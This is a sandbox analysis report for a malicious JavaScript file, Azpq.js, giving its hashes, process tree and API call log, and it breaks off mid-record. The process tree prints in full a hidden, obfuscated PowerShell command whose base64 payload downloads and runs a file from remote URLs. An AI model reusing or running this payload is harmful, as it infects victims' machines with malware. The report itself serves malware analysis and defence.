Summary | ZeroBOX

Azpq.js

Generic Malware Antivirus Hide_URL AntiDebug AntiVM PowerShell
Category Machine Started Completed
FILE s1_win7_x6402 May 16, 2023, 10:33 a.m. May 16, 2023, 10:35 a.m.
Size 215.1KB
Type ASCII text, with very long lines, with CRLF line terminators
MD5 e4195aae5423bf84ce95fdc8b6c37919
SHA256 25e9b8c7452955b0a5a9074e960595c854a0fd1eec5c132a262b280f0f9aa28d
CRC32 2BE62984
ssdeep 1536:gN1FU9aNY8HOAwjyrrPA92860bRjFT9aCHa9YCtbwgGN5O6xxdHJosGBywEAFEyO:mU9av3w0rTY/T9a4amsl1gOEyk2I8izL
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Azpq.js

    3048
    • wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Azpq.js" Pinbrain AlphanumericBristles hyperbarbarismPhenazine

      2188
      • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden -ExecutionPolicy Bypass -NoLogo -NoProfile -encodedcommand "JABiAG8AbABlAHcAbwByAHQAIAA9ACAAIgBhAHIAYQB3AGEAawAiADsAUwB0AGEAcgB0AC0AUwBsAGUAZQBwACAALQBTAGUAYwBvAG4AZABzACAAMQA0ADsAJAB1AG4AaABvAG0AbwBsAG8AZwBpAHoAZQBkAEQAaQBzAHQAcgBhAGMAdABpAG4AZwAgAD0AIAAiAGgAbwBsAGwAeQBoAG8AYwBrACIAOwAkAGIAdQBtAGIAbABlAGIAZQByAHIAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANQBBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAHcAQQB1AEEARABFAEEATQBRAEEAMQBBAEMANABBAE0AZwBBADEAQQBEAFUAQQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUQBBAEgASQBBAFoAUQBCADIAQQBHAGsAQQBjAHcAQgBwAEEARwBJAEEAYgBBAEIANQBBAEUAOABBAFkAdwBCAGoAQQBHAGsAQQBaAEEAQgBsAEEARwA0AEEAZABBAEIAaABBAEcAdwBBAGMAdwBBAHUAQQBHAGMAQQBZAFEAQgB0AEEARwBVAEEAYwB3AEEAPQB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCAGoAQQBHAGsAQQBjAHcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEMANABBAGMAQQBCAGgAQQBIAEkAQQBkAEEAQgB1AEEARwBVAEEAYwBnAEIAegBBAEEAPQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBRAEEAWgBRAEIAMwBBAEcATQBBAGQAUQBCAHcAQQBGAEEAQQBiAHcAQgB6AEEASABRAEEAWgBRAEIAdQBBAEcATQBBAFoAUQBCAHcAQQBHAGcAQQBZAFEAQgBzAEEARwA4AEEAYgBnAEEAdQBBAEcAUQBBAGIAdwBCAG4AQQBBAD0APQAiADsAJABtAHkAZQBsAG8AbgBpAGMAIAA9ACAAIgBtAGEAegBlAGQAbAB5AEcAbAB5AGMAbwBnAGUAbgBvAGwAeQBzAGkAcwAiADsAJABTAHEAdQBpAGwAbABpAGQAYQBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABBAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBAHkAQQBDADQAQQBOAEEAQQAxAEEAQwA0AEEATwBBAEEAdgBBAEcAWQBBAGEAZwBCAE8AQQBFAGsAQQBWAEEAQgB3AEEARwBNAEEATAB3AEIAVgBBAEgAWQBBAE4AZwBBAHkAQQBFAEUAQQBPAFEAQgB0AEEAQQA9AD0AVwBmAHgAZgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBPAFEAQQB1AEEARABFAEEATgB3AEEAeQBBAEMANABBAE4AQQBBADEAQQBDADQAQQBPAFEAQQB2AEEARQB3AEEAWgBRAEIAeABBAEMAOABBAFQAUQBCAEkAQQBGAEEAQQBWAFEAQgBCAEEARQBVAEEAZAB3AEEAdwBBAEcARQBBAFcAUQBCAFEAQQBBAD0APQAiADsAZgBvAHIAZQBhAGMAaAAgACgAJABpAG4AYwBvAG0AbQBvAGQAaQBvAHUAcwAgAGkAbgAgACQAUwBxAHUAaQBsAGwAaQBkAGEAZQAgAC0AcwBwAGwAaQB0ACAAIgBXAGYAeABmACIAKQAgAHsAJAByAGEAdgBpAHMAaABtAGUAbgB0AHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB5AEEASABrAEEAYwBBAEIAbwBBAEcARQBBAFoAUQBCAHUAQQBHAGsAQQBaAEEAQgBRAEEARwBnAEEAWgBRAEIAdQBBAEcAOABBAGUAQQBCAHAAQQBHAFEAQQBMAGcAQgB1AEEARwBjAEEAYgB3AEEAPQB5AHIAPQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAEkAQQBhAFEAQgB2AEEASABBAEEAYQBBAEIANQBBAEgAUQBBAFoAUQBCAFEAQQBIAEkAQQBaAFEAQgB3AEEARwBFAEEAYwBnAEIAaABBAEgAUQBBAGEAUQBCADIAQQBHAFUAQQBMAGcAQgAwAEEARwA4AEEAZQBRAEIAegBBAEEAPQA9ACIAOwB0AHIAeQAgAHsAJAB0AGUAbABlAGMAYQBtAGUAcgBhACAAPQAgADMAMAA0ADsAJABpAG4AYwBsAGEAcwBwAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBuAGkAYwBvAGQAZQAuAEcAZQB0AFMAdAByAGkAbgBnACgAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAaQBuAGMAbwBtAG0AbwBkAGkAbwB1AHMAKQApADsAaQB3AHIAIAAkAGkAbgBjAGwAYQBzAHAAcwAgAC0ATwAgAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAGYAbwB1AGwAaQBzAGgAUgBpAHYAZQByAGwAZQBzAHMALgBBAGcAbwBuAGkAYQBQAGgAbwBuAG8AbQBpAG0AaQBjADsAJABjAGEAZQBzAGEAcgBpAHMAdABzACAAPQAgACIAUwBhAHIAbwBuAGkAYwBJAG4AdgBhAGcAaQBuAGEAdABpAG4AZwAiADsAJABUAHcAaQBzAHQAZQBuAGUAZABIAGUAbQBpAGUAcABpAGwAZQBwAHMAeQAgAD0AIAAiAHIAZQBjAGEAcAB0AGkAdgBhAHQAaQBvAG4AUwBpAG0AcABsAHkAIgA7ACQAdABpAHQAbABlAG4AZQBHAHUAbgBkAGkAZQAgAD0AIAAiAE4AbwBuAGIAYQBzAGUAbQBlAG4AdABXAGkAcwBlAGgAZQBhAHIAdABlAGQAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABQAHIAbwBnAHIAYQBtAEQAYQB0AGEAXABmAG8AdQBsAGkAcwBoAFIAaQB2AGUAcgBsAGUAcwBzAC4AQQBnAG8AbgBpAGEAUABoAG8AbgBvAG0AaQBtAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADEAMgA3ADAAOAAwACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBaAGcAQgB2AEEASABVAEEAYgBBAEIAcABBAEgATQBBAGEAQQBCAFMAQQBHAGsAQQBkAGcAQgBsAEEASABJAEEAYgBBAEIAbABBAEgATQBBAGMAdwBBAHUAQQBFAEUAQQBaAHcAQgB2AEEARwA0AEEAYQBRAEIAaABBAEYAQQBBAGEAQQBCAHYAQQBHADQAQQBiAHcAQgB0AEEARwBrAEEAYgBRAEIAcABBAEcATQBBAEwAQQBCAHcAQQBIAEkAQQBhAFEAQgB1AEEASABRAEEATwB3AEIATwBBAEcAVQBBAGUAQQBCADAAQQBFAG8AQQBVAHcAQQA9ACIAOwAkAE4AdQBuAG4AaQBzAGgAIAA9ACAAIgBJAGcAbgBlAG8AYQBxAHUAZQBvAHUAcwBVAG4AcgBvAGIAZQBkACIAOwAkAFEAdQBlAHMAdABpAG8AbgBhAGIAbABlACAAPQAgACIARwBvAG8AcwBlAGIAZQByAHIAeQBOAG8AbgBjAG8AZQByAGMAaQBvAG4AIgA7AGIAcgBlAGEAawA7AE4AZQB4AHQASgBTADsAfQBOAGUAeAB0AEoAUwA7AH0AIABjAGEAdABjAGgAIAB7ACQAdgBlAHIAbgBpAHgAZQBzAFMAbgBhAHAAZAByAGEAZwBvAG4AcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeQBBAEQATQBBAE8AUQBBAHUAQQBEAEkAQQBNAEEAQQAyAEEAQwA0AEEATgBBAEEAMQBBAEMANABBAE0AUQBBADAAQQBEAEkAQQB4AE8ATQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAEQAQQBHADgAQQBiAEEAQgBzAEEARwBVAEEAZABBAEIAcABBAEcANABBAFoAdwBCAFcAQQBHAFUAQQBjAGcAQgB1AEEARwBFAEEAWQB3AEIAMQBBAEcAdwBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQgAwAEEAQwA0AEEAWQB3AEIAeQBBAEcAawBBAFkAdwBCAHIAQQBHAFUAQQBkAEEAQQA9AHgATwBNAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAUwBBAEcARQBBAGQAZwBCAGwAQQBHAHcAQQBhAFEAQgB1AEEARwBjAEEAYwB3AEIAUABBAEgAVQBBAGQAQQBCAHoAQQBHAEUAQQBkAEEAQQB1AEEARwAwAEEAWgBRAEEAPQAiADsAJABDAG8AbgBjAGUAcwBzAGkAbwBuAGEAaQByAGUAcwBHAGwAdQBtAHAAaQBuAGUAcwBzACAAPQAgACIAQgB1AHAAbABlAHUAcgB1AG0AQwBhAHQAZQBnAG8AcgBpAHMAZQAiADsAJABhAHMAYwBhAGIAYQByAHQARgBhAGMAaQBsAGkAdABhAHQAaQB2AGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAEEAQQBOAHcAQQB1AEEARABVAEEATgBBAEEAdQBBAEQAawBBAE0AZwBBAHUAQQBEAFUAQQBOAFEAQQA9AGsAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBrAEEAYgBRAEIAdwBBAEgASQBBAFoAUQBCAHoAQQBIAE0AQQBZAFEAQgB5AEEARwBrAEEATABnAEIAbwBBAEcAOABBAGIAQQBCAGsAQQBHAGsAQQBiAGcAQgBuAEEASABNAEEAawBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHUAQQBHADgAQQBiAGcAQgB6AEEARwBVAEEAYwBnAEIAcABBAEcAOABBAGQAUQBCAHoAQQBHAHcAQQBlAFEAQQB1AEEARwBFAEEAWQB3AEIAagBBAEcAOABBAGQAUQBCAHUAQQBIAFEAQQBZAFEAQgB1AEEASABRAEEAYwB3AEEAPQBrAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAMQBBAEcANABBAGMAUQBCADEAQQBHAFUAQQBjAGcAQgBwAEEARwBVAEEAWgBBAEEAdQBBAEcAWQBBAGMAZwBBAD0AIgA7AH0AfQAkAEUAeABzAGUAYwBhAG4AdABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWQBRAEIAMABBAEgAUQBBAGIAQQBCAGwAQQBHAEkAQQBkAFEAQgB6AEEARwBnAEEAUQBnAEIAcABBAEcAYwBBAGEAQQBCADAAQQBHAFUAQQBaAEEAQQB1AEEARwAwAEEAWQBRAEIAeQBBAEcAcwBBAFoAUQBCADAAQQBBAD0APQAiADsAJABzAHEAdQBpAGIAcwB0AGUAcgBIAGUAeABhAG0AZQB0AGgAeQBsAGUAbgBlAHQAZQB0AHIAYQBtAGkAbgBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARgBRAEEAYwBnAEIAaABBAEcATQBBAGEAQQBCAGwAQQBHAGsAQQBaAEEAQgBsAEEARQA4AEEAWgBnAEIAbQBBAEcAVQBBAGIAZwBCAHoAQQBHAGsAQQBkAGcAQgBsAEEASABNAEEATABnAEIAdABBAEcAOABBAGIAUQBBAD0AbABpAEEAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATgB3AEEAeQBBAEMANABBAE0AZwBBAHkAQQBEAEUAQQBMAGcAQQB5AEEARABRAEEATgBBAEEAdQBBAEQASQBBAE0AQQBBADEAQQBBAD0APQBsAGkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAGcAQQBOAHcAQQB1AEEARABFAEEATQBnAEEAeQBBAEMANABBAE0AUQBBADQAQQBEAEkAQQBMAGcAQQAzAEEARABNAEEAIgA7ACQAdAByAG8AcABoAG8AZABlAHIAbQBCAGUAbgB6AGkAbAAgAD0AIAAyADEANwA7AA=="

        2384

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0

GetComputerNameA

computer_name: TEST22-PC
1 1 0

GetComputerNameW

computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426e30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426b70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426b70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426b70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426770
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426270
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426930
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426d70
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426c30
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

buffer: <INVALID POINTER>
crypto_handle: 0x00426330
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2188
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x742c2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 1966080
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02950000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73971000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73972000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02202000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af1000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02af2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0222a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02203000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02204000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0224b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02247000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02222000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02245000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02205000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0222c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02950000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02206000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0224c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02223000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02224000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02225000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02226000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02227000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02228000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2384
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
